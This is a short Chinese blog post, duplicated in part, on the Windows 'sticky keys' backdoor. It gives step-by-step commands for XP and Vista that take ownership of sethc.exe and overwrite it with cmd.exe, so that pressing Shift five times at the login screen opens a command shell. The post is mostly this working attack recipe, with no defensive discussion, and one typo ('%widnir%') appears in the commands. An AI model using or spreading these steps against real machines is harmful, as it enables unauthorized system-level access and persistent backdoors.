本文介绍了一个Windows系统的安全漏洞,通过替换SetHC.exe文件为cmd.exe,用户可以在登录界面通过连续按下Shift键五次的方式启动命令行界面,从而获得shell权限。文中详细描述了在不同Windows版本中实现这一操作的具体步骤。
在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。
参考McafeeAvertLabs:
http://www.avertlabs.com/research/blog/?p=218
XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%/system32/dllcache
ren sethc.exe *.ex~
cd %widnir%/system32
copy /y cmd.exe sethc.exe
VISTA:
takeown /f c:/windows/system32/sethc.exe
cacls c:/windows/system32/sethc.exe /G administrator:F
然后按XP方法替换文件
在登录界面按5此SHIFT,出来cmd shell,然后……
参考McafeeAvertLabs:
http://www.avertlabs.com/research/blog/?p=218
XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%/system32/dllcache
ren sethc.exe *.ex~
cd %widnir%/system32
copy /y cmd.exe sethc.exe
VISTA:
takeown /f c:/windows/system32/sethc.exe
cacls c:/windows/system32/sethc.exe /G administrator:F
然后按XP方法替换文件
在登录界面按5此SHIFT,出来cmd shell,然后……
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
